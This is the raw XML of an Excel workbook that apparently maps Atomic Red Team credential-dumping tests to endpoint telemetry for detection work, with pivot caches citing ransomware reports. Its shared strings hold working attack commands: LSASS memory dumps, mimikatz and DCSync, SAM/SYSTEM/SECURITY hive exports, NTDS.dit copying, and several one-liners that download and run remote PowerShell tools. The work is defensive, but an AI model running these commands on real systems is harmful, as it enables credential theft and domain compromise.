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harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{8372AB7B-2F00-2546-9BA8-EEAEDB6D796E}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{503C4303-42A1-DB4B-BD90-2FBAE899660F}"/>
  </bookViews>
  <sheets>
    <sheet name="process_create" sheetId="1" r:id="rId1"/>
    <sheet name="process_access" sheetId="6" r:id="rId2"/>
    <sheet name="file_event" sheetId="7" r:id="rId3"/>
    <sheet name="winevt_4624" sheetId="8" r:id="rId4"/>
    <sheet name="winevt_7045" sheetId="9" r:id="rId5"/>
    <sheet name="mde" sheetId="13" r:id="rId6"/>
    <sheet name="generic" sheetId="5" r:id="rId7"/>
    <sheet name="pc_pivot" sheetId="3" r:id="rId8"/>
    <sheet name="pa_pivot" sheetId="10" r:id="rId9"/>
    <sheet name="file_pivot" sheetId="11" r:id="rId10"/>
    <sheet name="gen_pivot" sheetId="12" r:id="rId11"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="397" r:id="rId12"/>
    <pivotCache cacheId="398" r:id="rId13"/>
    <pivotCache cacheId="399" r:id="rId14"/>
    <pivotCache cacheId="400" r:id="rId1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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="244" uniqueCount="198">
  <si>
    <t>delta_pid</t>
  </si>
  <si>
    <t>process_cmdline</t>
  </si>
  <si>
    <t>initiating_process_cmdline</t>
  </si>
  <si>
    <t>process_name</t>
  </si>
  <si>
    <t>initiating_process_name</t>
  </si>
  <si>
    <t>data_object</t>
  </si>
  <si>
    <t>delta_eid</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of delta_eid</t>
  </si>
  <si>
    <t>Count of delta_pid</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>hscript</t>
  </si>
  <si>
    <t>file_action</t>
  </si>
  <si>
    <t>process_path</t>
  </si>
  <si>
    <t>initiating_process_path</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t>file_name</t>
  </si>
  <si>
    <t>c2</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>sub_sid</t>
  </si>
  <si>
    <t>logon_type</t>
  </si>
  <si>
    <t>logon_process_name</t>
  </si>
  <si>
    <t>src_process</t>
  </si>
  <si>
    <t>src_process_path</t>
  </si>
  <si>
    <t>tgt_process</t>
  </si>
  <si>
    <t>tgt_process_path</t>
  </si>
  <si>
    <t>access</t>
  </si>
  <si>
    <t>trace</t>
  </si>
  <si>
    <t>object</t>
  </si>
  <si>
    <t>sub_account</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>initiating_file_name</t>
  </si>
  <si>
    <t>service_name</t>
  </si>
  <si>
    <t>start_type</t>
  </si>
  <si>
    <t>service_file_name</t>
  </si>
  <si>
    <t>initiating_process_name_parent</t>
  </si>
  <si>
    <t>service_account</t>
  </si>
  <si>
    <t>initiating_file_path</t>
  </si>
  <si>
    <t>(blank)</t>
  </si>
  <si>
    <t>account</t>
  </si>
  <si>
    <t>Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)</t>
  </si>
  <si>
    <t>C:\Windows\System32\inetsrv\appcmd.exe list apppool /config</t>
  </si>
  <si>
    <t>Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)</t>
  </si>
  <si>
    <t>gsecdump -a</t>
  </si>
  <si>
    <t>Gsecdump</t>
  </si>
  <si>
    <t>$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full</t>
  </si>
  <si>
    <t>Dump svchost.exe to gather RDP credentials</t>
  </si>
  <si>
    <t>rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1&gt;$Null</t>
  </si>
  <si>
    <t>Send NTLM Hash with RPC Test Connection</t>
  </si>
  <si>
    <t>rundll32.exe keymgr,KRShowKeyMgr</t>
  </si>
  <si>
    <t>Dump Credential Manager using keymgr.dll and rundll32.exe</t>
  </si>
  <si>
    <t>procdump.exe  -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using ProcDump</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using comsvcs.dll</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using direct system calls and API unhooking</t>
  </si>
  <si>
    <t>Outflank-Dumpert.exe</t>
  </si>
  <si>
    <t>C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using Windows Task Manager</t>
  </si>
  <si>
    <t>{"folder": "T1003.001", "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager", "uuid": "dea6c349-f1c6-44f3-87a1-1ed33a59a607"}</t>
  </si>
  <si>
    <t>mimikatz.exe "sekurlsa::minidump %tmp%\lsass.DMP" "sekurlsa::logonpasswords full" exit</t>
  </si>
  <si>
    <t>Offline Credential Theft With Mimikatz</t>
  </si>
  <si>
    <t>pypykatz live lsa</t>
  </si>
  <si>
    <t>LSASS read with pypykatz</t>
  </si>
  <si>
    <t>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump</t>
  </si>
  <si>
    <t>Dump LSASS.exe Memory using Out-Minidump.ps1</t>
  </si>
  <si>
    <t>Create Mini Dump of LSASS.exe using ProcDump</t>
  </si>
  <si>
    <t>procdump.exe -accepteula -mm lsass.exe lsass_dump.dmp</t>
  </si>
  <si>
    <t>Powershell Mimikatz</t>
  </si>
  <si>
    <t>IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz -DumpCreds</t>
  </si>
  <si>
    <t>$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
&amp; "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id</t>
  </si>
  <si>
    <t>Dump LSASS with createdump.exe from .Net v5</t>
  </si>
  <si>
    <t>if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
&amp; $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."</t>
  </si>
  <si>
    <t>Dump LSASS.exe using lolbin rdrleakdiag.exe</t>
  </si>
  <si>
    <t>Registry dump of SAM, creds, and secrets</t>
  </si>
  <si>
    <t>Registry parse with pypykatz</t>
  </si>
  <si>
    <t>esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}</t>
  </si>
  <si>
    <t>esentutl.exe SAM copy</t>
  </si>
  <si>
    <t>PowerDump Hashes and Usernames from Registry</t>
  </si>
  <si>
    <t>Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump</t>
  </si>
  <si>
    <t>for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 &gt;nul 2&gt;&amp;1) &amp; dir /B %temp%\#{target_hive}vss*</t>
  </si>
  <si>
    <t>dump volume shadow copy hives with certutil</t>
  </si>
  <si>
    <t>dump volume shadow copy hives with System.IO.File</t>
  </si>
  <si>
    <t>1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\Windows\System32\config\SAM" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\SAMvss$_" -ErrorAction Ignore
}</t>
  </si>
  <si>
    <t>iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive</t>
  </si>
  <si>
    <t>WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes</t>
  </si>
  <si>
    <t>Dumping of SAM, creds, and secrets(Reg Export)</t>
  </si>
  <si>
    <t>test</t>
  </si>
  <si>
    <t>{"uuid": "84113186-ed3c-4d0d-8a3c-8980c86c1f4a"}</t>
  </si>
  <si>
    <t>{"uuid": "0b207037-813c-4444-ac3f-b597cf280a67"}</t>
  </si>
  <si>
    <t>{"uuid": "6c7a4fd3-5b0b-4b30-a93e-39411b25d889"}</t>
  </si>
  <si>
    <t>{"uuid": "96345bfc-8ae7-4b6a-80b7-223200f24ef9"}</t>
  </si>
  <si>
    <t>{"uuid": "0c0f5f06-166a-4f4d-bb4a-719df9a01dbb"}</t>
  </si>
  <si>
    <t>{"uuid": "2536dee2-12fb-459a-8c37-971844fa73be"}</t>
  </si>
  <si>
    <t>{"uuid": "7ae7102c-a099-45c8-b985-4c7a2d05790d"}</t>
  </si>
  <si>
    <t>{"uuid": "453acf13-1dbd-47d7-b28a-172ce9228023"}</t>
  </si>
  <si>
    <t>{"uuid": "c37bc535-5c62-4195-9cc3-0517673171d8"}</t>
  </si>
  <si>
    <t>{"uuid": "6502c8f0-b775-4dbd-9193-1298f56b6781"}</t>
  </si>
  <si>
    <t>t1003.001-t13</t>
  </si>
  <si>
    <t>{"uuid": "47a539d1-61b9-4364-bf49-a68bc2a95ef0"}</t>
  </si>
  <si>
    <t>t1003.001-t11</t>
  </si>
  <si>
    <t>{"uuid": "9d0072c8-7cca-45c4-bd14-f852cfa35cf0"}</t>
  </si>
  <si>
    <t>t1003.001-t10</t>
  </si>
  <si>
    <t>{"uuid": "66fb0bc1-3c3f-47e9-a298-550ecfefacbc"}</t>
  </si>
  <si>
    <t>{"uuid": "21df41be-cdd8-4695-a650-c3981113aa3c"}</t>
  </si>
  <si>
    <t>{"uuid": "0be2230c-9ab3-4ac2-8826-3199b9a0ebf8"}</t>
  </si>
  <si>
    <t>t1003.001-t01</t>
  </si>
  <si>
    <t>t1003.001-t02</t>
  </si>
  <si>
    <t>t1003.001-t03</t>
  </si>
  <si>
    <t>t1003.001-t06</t>
  </si>
  <si>
    <t>t1003.001-t07</t>
  </si>
  <si>
    <t>t1003.001-t08</t>
  </si>
  <si>
    <t>t1003.002-t07</t>
  </si>
  <si>
    <t>t1003.002-t08</t>
  </si>
  <si>
    <t>t1003-t01</t>
  </si>
  <si>
    <t>t1003-t03</t>
  </si>
  <si>
    <t>t1003-t04</t>
  </si>
  <si>
    <t>t1003-t05</t>
  </si>
  <si>
    <t>t1003-t06</t>
  </si>
  <si>
    <t>t1003-t07</t>
  </si>
  <si>
    <t>t1003.002-t06</t>
  </si>
  <si>
    <t>{"uuid": "9d77fed7-05f8-476e-a81b-8ff0472c64d0"}</t>
  </si>
  <si>
    <t>t1003.002-t05</t>
  </si>
  <si>
    <t>t1003.002-t09</t>
  </si>
  <si>
    <t>t1003.002-t04</t>
  </si>
  <si>
    <t>t1003.002-t03</t>
  </si>
  <si>
    <t>t1003.002-t02</t>
  </si>
  <si>
    <t>t1003.002-t01</t>
  </si>
  <si>
    <t>{"uuid": "804f28fc-68fc-40da-b5a2-e9d0bce5c193"}</t>
  </si>
  <si>
    <t>{uuid": "eeb9751a-d598-42d3-b11c-c122d9c3f6c7"}</t>
  </si>
  <si>
    <t>{"uuid": "a96872b2-cbf3-46cf-8eb4-27e8c0e85263"}</t>
  </si>
  <si>
    <t>{"uuid": "a90c2f4d-6726-444e-99d2-a00cd7c20480"}</t>
  </si>
  <si>
    <t>{"uuid": "5c2571d0-1572-416d-9676-812e64ca9f44"}</t>
  </si>
  <si>
    <t>{"uuid": "7cede33f-0acd-44ef-9774-15511300b24b"}</t>
  </si>
  <si>
    <t>{"uuid": "42510244-5019-48fa-a0e5-66c3b76e6049"}</t>
  </si>
  <si>
    <t>{"uuid": "d400090a-d8ca-4be0-982e-c70598a23de9"}</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with vssadmin</t>
  </si>
  <si>
    <t>t1003.003-t01</t>
  </si>
  <si>
    <t>{"uuid": "dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f"}</t>
  </si>
  <si>
    <t>{"uuid": "c6237146-9ea6-4711-85c9-c56d263a6b03"}</t>
  </si>
  <si>
    <t>t1003.003-t02</t>
  </si>
  <si>
    <t>Copy NTDS.dit from Volume Shadow Copy</t>
  </si>
  <si>
    <t>Dump Active Directory Database with NTDSUtil</t>
  </si>
  <si>
    <t>mkdir C:\Windows\Temp\ntds_T1003
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q</t>
  </si>
  <si>
    <t>t1003.003-t03</t>
  </si>
  <si>
    <t>{"uuid": "2364e33d-ceab-4641-8468-bfb1d7cc2723"}</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with WMI</t>
  </si>
  <si>
    <t>wmic shadowcopy call create Volume=C:\</t>
  </si>
  <si>
    <t>vssadmin.exe create shadow /for=C:</t>
  </si>
  <si>
    <t>{"uuid": "224f7de0-8f0a-4a94-b5d8-989b036c86da"}</t>
  </si>
  <si>
    <t>t1003.003-t04</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy remotely with WMI</t>
  </si>
  <si>
    <t>wmic /node:&lt;host&gt; shadowcopy call create Volume=C:\</t>
  </si>
  <si>
    <t>t1003.003-t05</t>
  </si>
  <si>
    <t>{"uuid": "d893459f-71f0-484d-9808-ec83b2b64226"}</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy remotely (WMI) with esentutl</t>
  </si>
  <si>
    <t>wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"</t>
  </si>
  <si>
    <t>wmic /node:&lt;host&gt; process call create "cmd.exe /c esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\ntds.dit</t>
  </si>
  <si>
    <t>t1003.003-t06</t>
  </si>
  <si>
    <t>{"uuid": "21c7bf80-3e8b-40fa-8f9d-f5b194ff2865"}</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with Powershell</t>
  </si>
  <si>
    <t>(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')</t>
  </si>
  <si>
    <t>t1003.003-t07</t>
  </si>
  <si>
    <t>{"uuid": "542bb97e-da53-436b-8e43-e0a7d31a6c24"}</t>
  </si>
  <si>
    <t>vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1</t>
  </si>
  <si>
    <t>Create Symlink to Volume Shadow Copy</t>
  </si>
  <si>
    <t>t1003.003-t08</t>
  </si>
  <si>
    <t>{"uuid": "21748c28-2793-4284-9e07-d6d028b66702"}</t>
  </si>
  <si>
    <t>C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*</t>
  </si>
  <si>
    <t>reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security</t>
  </si>
  <si>
    <t>reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security</t>
  </si>
  <si>
    <t>copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE</t>
  </si>
  <si>
    <t>mkdir c:\exfil
diskshadow.exe /s diskshadow.txt</t>
  </si>
  <si>
    <t>Create Volume Shadow Copy with diskshadow</t>
  </si>
  <si>
    <t>t1003.003-t09</t>
  </si>
  <si>
    <t>{"uuid": "b385996c-0e7d-4e27-95a4-aca046b119a7"}</t>
  </si>
  <si>
    <t>Dumping LSA Secrets</t>
  </si>
  <si>
    <t>PsExec.exe -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y</t>
  </si>
  <si>
    <t>t1003.004-t01</t>
  </si>
  <si>
    <t>{"uuid": "55295ab0-a703-433b-9ca4-ae13807de12f"}</t>
  </si>
  <si>
    <t>Dump Kerberos Tickets from LSA using dumper.ps1</t>
  </si>
  <si>
    <t>Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/Powersh</t>
  </si>
  <si>
    <t>t1003.004-t02</t>
  </si>
  <si>
    <t>{"uuid": "2dfa3bff-9a27-46db-ab75-7faefdaca732"}</t>
  </si>
  <si>
    <t>Cached Credential Dump via Cmdkey</t>
  </si>
  <si>
    <t>cmdkey /list</t>
  </si>
  <si>
    <t>t1003.005-t01</t>
  </si>
  <si>
    <t>{"uuid": "56506854-89d6-46a3-9804-b7fde90791f9"}</t>
  </si>
  <si>
    <t>mimikatz.exe "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"</t>
  </si>
  <si>
    <t>DCSync (Active Directory)</t>
  </si>
  <si>
    <t>t1003.006-t01</t>
  </si>
  <si>
    <t>{"uuid": "129efd28-8497-4c87-a1b0-73b9a870ca3e"}</t>
  </si>
  <si>
    <t>Run DSInternals Get-ADReplAccount</t>
  </si>
  <si>
    <t>Get-ADReplAccount -All -Server $ENV:logonserver.TrimStart("\")</t>
  </si>
  <si>
    <t>t1003.006-t02</t>
  </si>
  <si>
    <t>{"uuid": "a0bced08-3fc5-4d8b-93b7-e8344739376e"}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</si>
</sst>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/>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1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6" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="21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rgb="FF92D050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rgb="FF00B0F0"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf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5" tint="-0.499984740745262"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="5" tint="-0.249977111117893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7" tint="-0.249977111117893"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf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3" tint="0.499984740745262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4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rvey Wargo" refreshedDate="45778.569829166663" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{18FB9807-E196-9540-BE4B-38DD33FA94D8}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table5"/>
  </cacheSource>
  <cacheFields count="8">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="htool" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="hscript" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="c2" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="19">
        <m/>
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2023-01012&quot;, &quot;url&quot;: &quot;https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2023-12-19&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{  &quot;date&quot;: &quot;2021&quot;, &quot;url&quot;: &quot;https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/08/ryuks-return/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;, &quot;url&quot;: &quot;https://talosintelligence.com/resources/269&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;url&quot;: &quot;https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}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rvey Wargo" refreshedDate="45778.569829282409" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{5CA93B16-8AF6-1046-BA3C-1426CD47B8CD}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table4"/>
  </cacheSource>
  <cacheFields count="10">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="file_action" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="file_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="file_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_file_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_file_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_cmdline" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="10" longText="1">
        <m/>
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-01&quot;: &quot;https://thedfirreport.com/2021/01/31/bazar-no-ryuk/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
